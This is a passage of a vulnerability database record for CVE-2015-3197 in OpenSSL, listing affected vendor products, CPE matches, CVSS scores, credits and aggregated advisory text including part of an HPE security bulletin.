      {
        "model": "centos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "centos",
        "version": "5"
      },
      {
        "model": "tivoli provisioning manager for os deployment build",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.20280.6"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.12"
      },
      {
        "model": "vm server for",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x863.4"
      },
      {
        "model": "project openssl 1.0.1r",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "cisco directors and switches with nx-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.1.0.0"
      },
      {
        "model": "telepresence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "87107010"
      },
      {
        "model": "powerkvm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.13"
      },
      {
        "model": "tivoli netcool reporter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2"
      },
      {
        "model": "rational developer for i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "rational developer for i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1.1"
      },
      {
        "model": "telepresence server on virtual machine",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "cognos tm1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.5"
      },
      {
        "model": "10.2-release-p12",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "rational application developer for websphere software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "infosphere data explorer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2-4"
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "tivoli provisioning manager for os deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.3"
      },
      {
        "model": "powerkvm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.165.4"
      },
      {
        "model": "10.2-stable",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.14"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.3"
      },
      {
        "model": "9.3-release-p5",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.0.4"
      },
      {
        "model": "unified intelligent contact management enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "security identity manager virtual appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.1"
      },
      {
        "model": "project openssl 1.0.1k",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3"
      },
      {
        "model": "rational developer for aix and linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1.2"
      },
      {
        "model": "telepresence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "13100"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.2"
      },
      {
        "model": "linux -current",
        "scope": null,
        "trust": 0.3,
        "vendor": "slackware",
        "version": null
      },
      {
        "model": "project openssl 1.0.1b",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "pureapplication system",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.2.2"
      },
      {
        "model": "watson explorer foundational components",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.0.0.0"
      },
      {
        "model": "powerkvm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.165.1"
      },
      {
        "model": "telepresence conductor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "image construction and composition tool",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3.2.0"
      },
      {
        "model": "series ip phones",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "88000"
      },
      {
        "model": "smartcloud entry appliance fixpac",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "project openssl 1.0.1s",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "pureapplication system if",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0.0.18"
      },
      {
        "model": "centos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "centos",
        "version": "6"
      },
      {
        "model": "sun blade ethernet switched nem 24p 10ge",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "60001.2"
      },
      {
        "model": "infosphere master data management standard/advanced edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "11.4"
      },
      {
        "model": "cognos tm1 interim fix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.0.2"
      },
      {
        "model": "10.1-release-p23",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "10.1-release-p16",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "business process manager standard",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.6"
      },
      {
        "model": "security identity manager virtual appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.0"
      },
      {
        "model": "unified communications manager session management edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "linux",
        "scope": null,
        "trust": 0.3,
        "vendor": "gentoo",
        "version": null
      },
      {
        "model": "9.3-release-p6",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "powerkvm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.165.5"
      },
      {
        "model": "i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "9.3-release-p9",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "project openssl 1.0.2c",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "mq light client module for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.2014090801"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.12"
      },
      {
        "model": "rational developer for aix and linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1.1"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "powerkvm sp1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "telepresence system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "500-320"
      },
      {
        "model": "unified attendant console enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unified contact center express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "cognos insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.2"
      },
      {
        "model": "tivoli provisioning manager for os deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.0.0"
      },
      {
        "model": "watson explorer foundational components",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.0.0"
      },
      {
        "model": "project openssl 1.0.2b",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "powerkvm build",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.165.7"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.1"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.8"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.3.0"
      },
      {
        "model": "9.3-release-p34",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "emergency responder",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "flex system chassis management module 2pet",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.0.2"
      },
      {
        "model": "telepresence system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "500-370"
      },
      {
        "model": "cloud manager with openstack interim fix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.0.3"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "30000"
      },
      {
        "model": "project openssl 1.0.1l",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "im and presence service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "vm virtualbox",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.16"
      },
      {
        "model": "9.3-release-p29",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "cognos insight fp if",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.126"
      },
      {
        "model": "vm server for",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x863.2"
      },
      {
        "model": "tivoli provisioning manager for images system edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x7.1.1.0"
      },
      {
        "model": "unity connection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.5.0.1"
      },
      {
        "model": "project openssl 1.0.1h",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "powerkvm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.158"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.0"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.0.1"
      },
      {
        "model": "project openssl 1.0.1p",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "unified computing system central software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.2"
      },
      {
        "model": "unified computing system central software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.1"
      },
      {
        "model": "unified computing system central software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.0"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#257823"
      },
      {
        "db": "BID",
        "id": "82237"
      },
      {
        "db": "BID",
        "id": "74491"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006985"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-026"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-3197"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:oracle:tuxedo:12.1.1.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:oracle:exalogic_infrastructure:1.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:exalogic_infrastructure:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.54:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.53:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.55:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1p:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1n:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1q:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1l:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1o:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2d:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:oracle:oss_support_tools:8.11.16.3.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:oracle:vm_virtualbox:5.0.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-3197"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Nimrod Aviram and Sebastian Schinzel",
    "sources": [
      {
        "db": "BID",
        "id": "82237"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-026"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2015-3197",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.3,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2015-3197",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.2,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.9,
            "baseSeverity": "Medium",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2015-3197",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2015-3197",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201602-026",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2015-3197",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-3197"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006985"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-026"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-3197"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "ssl/s2_srvr.c in OpenSSL 1.0.1 before 1.0.1r and 1.0.2 before 1.0.2f does not prevent use of disabled ciphers, which makes it easier for man-in-the-middle attackers to defeat cryptographic protection mechanisms by performing computations on SSLv2 traffic, related to the get_client_master_key and get_client_hello functions. OpenSSL may generate unsafe primes for use in the Diffie-Hellman protocol, which may lead to disclosure of enough information for an attacker to recover the private encryption key. OpenSSL is prone to a security-bypass vulnerability. \nSuccessfully exploiting this issue may allow attackers to perform unauthorized actions. This may lead to other attacks. Cisco Unified Computing System Central Software is prone to an arbitrary command-execution vulnerability. \nAn attacker can exploit this issue to execute system commands on the underlying operating system. \nThis issue being tracked by Cisco Bug ID CSCut46961. Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the\nApache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat\nConnector(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and\nthe Tomcat Native library. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05390893\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c05390893\nVersion: 1\n\nHPESBHF03703 rev.1 -  HPE Network Products including Comware v7 and VCX using\nOpenSSL, Remote Unauthorized Disclosure of Information\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2017-02-14\nLast Updated: 2017-02-14\n\nPotential Security Impact: Remote: Unauthorized Disclosure of Information\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities with OpenSSL have been addressed in HPE\nNetwork Products including Comware v7 and VCX. The vulnerabilities could be\nremotely exploited resulting in disclosure of information. \n\nReferences:\n\n  - CVE-2015-3197 - OpenSSL, Remote unauthorized disclosure of information\n  - CVE-2016-0701 - OpenSSL, Remote unauthorized disclosure of information\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n  - VCX Products all prior versions - impacted by CVE-2015-3197 only. Please\nrefer to the RESOLUTION below for a list of updated products. \n  - Comware 7 (CW7) Products all prior versions - impacted by CVE-2015-3197\nand CVE-2016-0701. Please refer to the RESOLUTION below for a list of updated\nproducts. \n\nBACKGROUND\n\n  CVSS Base Metrics\n  =================\n  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n    CVE-2015-3197\n      5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n      4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n    CVE-2016-0701\n      3.7 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N\n      2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)\n\n    Information on CVSS is documented in\n    HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has made the following software updates to resolve the vulnerability in\nthe Comware v7 and VCX products. \n\n**COMWARE 7 Products**\n\n  + **12500 (Comware 7) - Version: R7377P01**\n    * HP Network Products\n      - JC072B HP 12500 Main Processing Unit\n      - JC085A HP A12518 Switch Chassis\n      - JC086A HP A12508 Switch Chassis\n      - JC652A HP 12508 DC Switch Chassis\n      - JC653A HP 12518 DC Switch Chassis\n      - JC654A HP 12504 AC Switch Chassis\n      - JC655A HP 12504 DC Switch Chassis\n      - JF430A HP A12518 Switch Chassis\n      - JF430B HP 12518 Switch Chassis\n      - JF430C HP 12518 AC Switch Chassis\n      - JF431A HP A12508 Switch Chassis\n      - JF431B HP 12508 Switch Chassis\n      - JF431C HP 12508 AC Switch Chassis\n      - JG497A HP 12500 MPU w/Comware V7 OS\n      - JG782A HP FF 12508E AC Switch Chassis\n      - JG783A HP FF 12508E DC Switch Chassis\n      - JG784A HP FF 12518E AC Switch Chassis\n      - JG785A HP FF 12518E DC Switch Chassis\n      - JG802A HP FF 12500E MPU\n    * CVEs\n      - CVE-2015-3197\n      - CVE-2016-0701\n  + **10500 (Comware 7) - Version: R7183**\n    * HP Network Products\n      - JC611A HP 10508-V Switch Chassis\n      - JC612A HP 10508 Switch Chassis\n      - JC613A HP 10504 Switch Chassis\n      - JC748A HP 10512 Switch Chassis\n      - JG608A HP FlexFabric 11908-V Switch Chassis\n      - JG609A HP FlexFabric 11900 Main Processing Unit\n      - JG820A HP 10504 TAA Switch Chassis\n      - JG821A HP 10508 TAA Switch Chassis\n      - JG822A HP 10508-V TAA Switch Chassis\n      - JG823A HP 10512 TAA Switch Chassis\n      - JG496A HP 10500 Type A MPU w/Comware v7 OS\n      - JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating\nSystem\n      - JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System\nMain Processing Unit\n    * CVEs\n      - CVE-2015-3197\n      - CVE-2016-0701\n  + **12900 (Comware 7) - Version: R1150**\n    * HP Network Products\n      - JG619A HP FlexFabric 12910 Switch AC 